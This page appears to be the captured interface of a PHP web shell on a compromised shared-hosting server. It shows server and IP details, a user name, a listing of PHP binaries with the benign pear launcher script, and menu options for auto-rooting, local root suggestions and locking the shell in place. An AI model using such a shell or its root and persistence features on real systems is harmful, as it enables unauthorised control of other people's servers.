Linux sv3046.xserver.jp 5.15.0-157-generic #167-Ubuntu SMP Wed Sep 17 21:35:53 UTC 2025 x86_64
Apache
Server IP : 202.254.234.47 & Your IP : 216.73.216.41
Domains :
Cant Read [ /etc/named.conf ]
User : kinomori
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Lock Shell
Lock File++
Readme
/
opt /
php-7.3.33-3 /
bin /
Delete
Unzip
Name
Size
Permission
Date
Action
pear
858
B
-rwxr-xr-x
2024-10-21 22:15
peardev
879
B
-rwxr-xr-x
2024-10-21 22:15
pecl
792
B
-rwxr-xr-x
2024-10-21 22:15
phar
14.48
KB
-rwxr-xr-x
2024-10-21 22:15
phar.phar
14.48
KB
-rwxr-xr-x
2024-10-21 22:15
php
45.49
MB
-rwxr-xr-x
2024-10-21 22:15
php-cgi
45.29
MB
-rwxr-xr-x
2024-10-21 22:15
php-config
4.9
KB
-rwxr-xr-x
2024-10-21 22:15
phpdbg
46.68
MB
-rwxr-xr-x
2024-10-21 22:15
phpize
4.44
KB
-rwxr-xr-x
2024-10-21 22:15
Save
Rename
#!/bin/sh # first find which PHP binary to use if test "x$PHP_PEAR_PHP_BIN" != "x"; then PHP="$PHP_PEAR_PHP_BIN" else if test "/opt/php-7.3.33-3/bin/php" = '@'php_bin'@'; then PHP=php else PHP="/opt/php-7.3.33-3/bin/php" fi fi # then look for the right pear include dir if test "x$PHP_PEAR_INSTALL_DIR" != "x"; then INCDIR=$PHP_PEAR_INSTALL_DIR INCARG="-d include_path=$PHP_PEAR_INSTALL_DIR" else if test "/opt/php-7.3.33-3/data/pear" = '@'php_dir'@'; then INCDIR=`dirname $0` INCARG="" else INCDIR="/opt/php-7.3.33-3/data/pear" INCARG="-d include_path=/opt/php-7.3.33-3/data/pear" fi fi exec $PHP -d date.timezone=UTC -d memory_limit="-1" -C -q $INCARG -d output_buffering=1 -d open_basedir="" -d safe_mode=0 -d register_argc_argv="On" -d auto_prepend_file="" -d variables_order=EGPCS -d auto_append_file="" $INCDIR/pearcmd.php "$@"